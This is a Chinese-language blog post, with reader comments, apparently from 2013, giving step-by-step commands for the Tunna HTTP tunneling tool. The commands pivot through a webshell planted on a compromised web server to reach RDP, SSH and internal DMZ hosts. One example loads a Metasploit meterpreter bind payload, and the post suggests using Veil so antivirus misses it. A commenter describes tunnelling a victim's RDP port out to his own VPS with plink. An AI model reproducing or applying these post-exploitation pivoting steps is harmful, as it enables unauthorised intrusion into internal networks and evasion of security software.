原理:就是个HTTP tunneling工具

+-------------------------------------------+                     +-------------------------------------------+
| Local Host                                |                     | Remote Host                               |
|-------------------------------------------|                     |-------------------------------------------|
|   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
|   |Client App|+----->|Local Proxy |<==========|  Firewall   |======>|  Webshell  |+------>|Server App|      |
|   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
+-------------------------------------------+                     +------------------------------------------ +

可以看出该工具先使用proxy.py监听本地一个端口,然后连接部署在远程WEB的webshell,远端的webshell会把端口转发请求转发到本地或者本地内网远程的主机,从而实现HTTP tunneling.这对于内网入侵来说,是很有用的一个工具.

该工具看起来是不是有似曾相识的感觉,恩.其实和reduh原理是一样的,不过tunna更稳定,速度更快.

下载地址是:http://www.secforce.com/media/tools/tunna_v0.1.zip

下面讲解4个实例,就能掌握该工具使用方法了.

实例1:

网站对外只开放了80端口,其他的端口都是关闭的,通过CVE-2013-225得到JSP的WEBSHELL后,上传conn.jsp,做转发,实现连接本机的其他端口.

直接扫描发现3389是关闭的

mickey@pentest:~# nmap -sS -p3389 219.x.x.x

Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close  

通过webshell上传conn.jsp到主机上,本地开始连接

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v

参数含义如下:

-l 表示本地监听的端口
-r 远程要转发的端口
-v 详细模式

然后本地执行

rdesktop 127.0.0.1:1234

就可以连接到目标的3389了

rdesktop 127.0.0.1:1234

实例2:

对于有些服务,比如SSH,还需要添加-s参数,才能保证连接的时候不会中断.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
ssh localhost -p 1234

保证连接的时候不会中断

实例3:

场景:已经得到DMZ区的一台主机的JSPSHELL,该主机的内网IP是172.16.100.20,通过查点,发现DMZ区还有其他的主机(172.16.100.20),并且开放了3389,我们想利用HTTP tunneling,连接到172.16.100.20的3389,命令如下

python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

这里多了一个-a参数,意义是要转发的IP

实例4:

对于喜欢metasploit的朋友,该工具也支持,不过如果对方有杀软的话,建议先用veil做好meterpreter的免杀.

首先把tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

然后开始利用

msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- 注意这里是指本地的公网IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j

tunna除了支持jsp还支持以下环境和脚本

conn.jsp Tested on Apache Tomcat (windows + linux)

conn.aspx Tested on IIS 6+8 (windows server 2003/2012)

conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

使用的时候需要注意:metasploit里的脚本只对应metasploit使用.

[原文地址]

留言评论(旧系统):

moonfly @ 2013-10-04 12:13:12

我前几天也遇到一个这样的场景,我不知道有本地的http proxy这个东东,不过我是上传了一个plink.exe(本来准备用nc,结果被杀毒给干掉了),从远程主机上ssh tunnel到我外网VPS的SSH 80端口上!吧3389端口映射到了我linux VPS 的本机3389,几乎是直通内网了!而且基本上只要远程服务器有任意一个TCP的端口可以访问出来,都可以这样干!

本站回复:

+10086

佚名 @ 2013-10-04 15:24:15

好东西,reduh太慢了~

本站回复:

+1

佚名 @ 2013-10-04 16:25:26

我按照第一条测试 但错误 本地和服务器都测试均失败。 C:\>proxy.py -u http://127.0.0.1/conn.aspx -l 1234 -r 3389 [+] Local Proxy listening at localhost:1234 Remote service to connect to at remotehost:3389 [Server] All good to go, ensure the listener is working ;-) [+] Spawning keep-alive thread [-] Keep-alive thread not required [+] Connected from ('127.0.0.1', 4286) Received Data: 0 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (19) Pings sent: 0 [+] Starting Ping thread Received Data: 0 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (0) Pings sent: 1 Received Data: 0 (0) Received Data From Ping Thread: 19 (19) Sent data: 19 (0) Pings sent: 1 [-] Disconnected Received Data: 0 (0) Received Data From Ping Thread: 19 (0) Sent data: 19 (0) Pings sent: 2 [Server] Killing the handler thread

本站回复:

这玩意儿我还没亲自试过,不确定问题何在……

佚名 @ 2013-10-04 23:02:58

from: can't read /var/mail/time import: unable to grab mouse `': Resource temporarily unavailable @ xwindow.c/XSelectWindow/8993. import: unable to grab mouse `': Resource temporarily unavailable @ xwindow.c/XSelectWindow/8993. ./proxy.py: line 12: syntax error near unexpected token `(' ./proxy.py: line 12: `class MainServerSocket(asyncore.dispatcher): #Initialise socket thread' BackTrack5 R3下测试 求解释 /var/mail/下未发现任何文件

本站回复:

这玩意儿我还没亲自试过,不确定问题何在……

佚名 @ 2013-10-21 17:29:56

转发3306不成功,不知道有这个功能没有

本站回复:

额……

佚名 @ 2014-08-09 16:51:35

onn.aspx -l 2020 -r 3389 -s -v [+] Local Proxy listening at localhost:2020 Remote service to connect to at remotehost:3389 [Server] All good to go, ensure the listener is working ;-) [+] Spawning keep-alive thread [-] Keep-alive thread not required ('[+] Connected from', ('127.0.0.1', 50979)) [+] Starting Ping thread Received Data: 0 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (19) Pings sent: 0 Received Data: 19 (19) Received Data From Ping Thread: 0 (0) Sent data: 19 (0) Pings sent: 0 [-] Disconnected Received Data: 19 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (0) Pings sent: 1 [Server] Killing the handler thread 一连接出现这样情况,请问前辈有遇到过吗

本站回复: